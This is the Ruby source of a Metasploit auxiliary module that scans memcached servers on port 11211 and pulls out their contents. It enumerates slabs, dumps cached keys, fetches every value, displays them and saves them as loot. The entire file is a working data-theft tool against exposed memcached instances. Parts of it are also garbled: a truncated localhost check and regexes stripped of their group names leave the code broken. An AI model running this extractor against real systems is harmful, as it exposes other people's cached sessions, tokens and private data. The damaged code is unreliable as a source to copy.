## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info = {}) super(update_info( info, 'Name' => 'Memcached Extractor', 'Description' => %q( This module extracts the slabs from a memcached instance. It then finds the keys and values stored in those slabs. ), 'Author' => [ 'Paul Deardorff ' ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://github.com/memcached/memcached/blob/master/doc/protocol.txt'] ] )) register_options( [ Opt::RPORT(11211) ], self.class ) register_advanced_options( [ OptInt.new('MAXKEYS', [true, 'Maximum number of keys to be pulled from each slab', 100]), OptInt.new('PRINTKEYS', [true, 'Number of keys shown in preview table for each instance', 10]) ], self.class ) end def max_keys datastore['MAXKEYS'].to_i end def print_keys datastore['PRINTKEYS'].to_i end def localhost?(ip) %w(localhost end # Returns array of keys for all slabs def enumerate_keys keys = [] enumerate_slab_ids.each do |sid| loop do sock.send("stats cachedump #{sid} #{max_keys}\r\n", 0) data = sock.recv(4096) break if !data || data.length == 0 matches = /^ITEM (?.*) \[/.match(data) keys << matches[:key] if matches break if data =~ /^END/ end end keys end # Returns array of slab ids as strings def enumerate_slab_ids sock.send("stats slabs\r\n", 0) slab_ids = [] loop do data = sock.recv(4096) break if !data || data.length == 0 matches = data.scan(/^STAT (?(\d)*):/) slab_ids << matches break if data =~ /^END/ end slab_ids.flatten! slab_ids.uniq! || [] end def data_for_keys(keys = []) all_data = {} keys.each do |key| sock.send("get #{key}\r\n", 0) data = [] loop do data_part = sock.recv(4096) break if !data_part || data_part.length == 0 data << data_part break if data_part =~ /^END/ end all_data[key] = data.join end all_data end def determine_version sock.send("version\r\n", 0) stats = sock.recv(4096) if /^VERSION (?[\d\.]+)/ =~ stats version else nil end end def run_host(ip) peer = "#{ip}:#{rport}" vprint_status("Connecting to memcached server...") begin connect if (version = determine_version) vprint_good("Connected to memcached version #{version}") unless localhost?(ip) report_service( host: ip, name: 'memcached', port: rport, proto: 'tcp', info: version ) end else print_error("unable to determine memcached protocol version") return end keys = enumerate_keys print_good("Found #{keys.size} keys") return if keys.size == 0 data = data_for_keys(keys) result_table = Rex::Text::Table.new( 'Header' => "Keys/Values Found for #{peer}", 'Indent' => 1, 'Columns' => [ 'Key', 'Value' ] ) data.take(print_keys).each { |key, value| result_table << [key, value.inspect] } print_line print_line("#{result_table}") unless localhost?(ip) path = store_loot('memcached.dump', 'text/plain', ip, data, 'memcached.txt', 'Memcached extractor') print_good("memcached loot stored at #{path}") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout vprint_error("Could not connect to memcached server!") end end end